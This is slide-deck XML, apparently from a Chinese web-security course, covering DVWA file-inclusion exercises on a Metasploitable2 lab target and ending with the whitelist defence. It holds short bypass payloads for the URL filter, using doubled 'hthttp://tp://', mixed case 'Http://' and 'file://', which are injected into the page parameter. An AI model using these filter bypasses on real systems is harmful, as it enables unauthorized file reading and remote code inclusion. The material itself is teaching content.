                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数，对page参数进行了一定的处理，将“http://”、“https://”、“../”、“..\”替换为空字符，即删除。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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zh-CN" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>显然这样，对本地文件包含攻击是没有防御的，对远程文件包含攻击有防御的。</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23" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463200" y="2187893"/>
            <a:ext cx="5272405" cy="1605915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478800" y="375285"/>
            <a:ext cx="10800000"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34112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（1）查看源代码，分析漏洞利用方法</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sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对本地文件包含攻击是没有防御的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:ea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endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:ea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endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:ea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endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:ea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endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1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sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对远程文件包含攻击有防御的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>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494155" y="2499360"/>
            <a:ext cx="9020175" cy="1495425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="4562475"/>
            <a:ext cx="11201400" cy="1838325"/>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251142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（2）漏洞利用</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① 使用双写绕过替换规则。例如，“hthttp://tp://”中间的“http://”被代替成""后剩下的字符仍然是“http://”，能够成功绕过。</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在客户机上，注入参数是hthttp://tp://192.168.1.228/phpinfo.txt。注入后，可看到漏洞利用成功。</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a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>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85595" y="3838575"/>
            <a:ext cx="9020175" cy="1485900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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218059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（2）漏洞利用</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② 使用大小写绕过替换规则。例如，“Http://”能够成功绕过。</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在客户机上，注入参数是Http://192.168.1.228/phpinfo.txt。注入后，可看到漏洞利用成功。</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a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>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85595" y="3514725"/>
            <a:ext cx="9020175" cy="1485900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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536321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（1）查看源代码</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5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可以看到，使用fnmatch</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函数检查page参数，要求page参数的开头必须是file，服务器才会去包含相应的文件。</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代码规定只能包含file开头的文件，看似安全，但是依然可以利用file协议绕过防护策略。</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24" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466800" y="2140268"/>
            <a:ext cx="5269230" cy="2243455"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>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7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7790815" y="2901315"/>
            <a:ext cx="3825240" cy="3175635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（1）Acunetix Threat Level是Acunetix检测网站安全等级。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">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000" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（2）Activity是扫描进度。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">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000" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（3）Target Information是目标服务器相关信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">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000" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（4）Latest Alerts是最新通知，可以看到漏洞等级及数量。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">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000" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（5）Discovered Hosts是被发现相关联的网址。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin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137" descr="C:\Users\lh\Desktop\第6章  Web应用安全（2021-7-12）\图片\6.1\6.1.11.png6.1.11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2686685"/>
            <a:ext cx="7010400" cy="3437255"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499110" y="1320165"/>
            <a:ext cx="11116945" cy="1274445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3、查看扫描结果</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>扫描完成后，在Scans模块的Scans Informationt选项卡中，可以看到简单的漏洞报告。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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00" y="1247775"/>
            <a:ext cx="11076305" cy="13538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（2）漏洞利用</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给page参数注入file://</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C:\phpinfo.php。注入后</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可看到漏洞利用成功。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>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85595" y="2686050"/>
            <a:ext cx="9020175" cy="1485900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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00" y="1247775"/>
            <a:ext cx="11036935" cy="470281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3</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lang="zh-CN" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>impossible</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>级别的文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>包含</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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1）查看源代码</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（2）源代码分析 </a:t>
            </a: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i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mpossible级别的代码使用了白名单机制进行防护，page参数必须为“include.php”、“file1.php”、“file2.php”、“file3.php”之一，彻底杜绝了文件包含漏洞。</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25" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466800" y="2187893"/>
            <a:ext cx="5267325" cy="1975485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47880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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3500">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件包含源代码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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成low级别的文件包含漏洞的利用。</a:t>
            </a:r>
            <a:endParaRPr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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成medium、high和impossible级别的File Upload源代码的分析。</a:t>
            </a:r>
            <a:endParaRPr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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成medium和high级别的文件包含漏洞的利用。</a:t>
            </a:r>
            <a:endParaRPr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47990"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2295525" y="2428240"/>
          <a:ext cx="8157845" cy="3762375"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1069975"/>
                <a:gridCol w="422021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项目名称：6.4 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>文件包含漏洞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600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>文件包含</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>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eaLnBrk="0" hangingPunct="0">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="CC0000"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1600" b="0">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>文件包含漏洞的利用和防御措施</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 name="表格 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>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lang="en-US" sz="1600">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>6.4 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>文件包含漏洞</a:t>
                      </a:r>
                      <a:endParaRPr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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="1853381"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>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7"/>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6" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>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12" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>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任务拓展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>】</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1653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4 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件包含漏洞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对靶机Metasploitable2-Linux的DVWA进行文件包含漏洞的利用。</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05</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sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>6.5 </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命令执行漏洞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0">
    <p:random/>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34" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14834"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任务描述</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84" y="6880"/>
                <a:ext cx="1622"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【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1825625"/>
            <a:ext cx="10800000" cy="2205990"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>理解命令执行漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
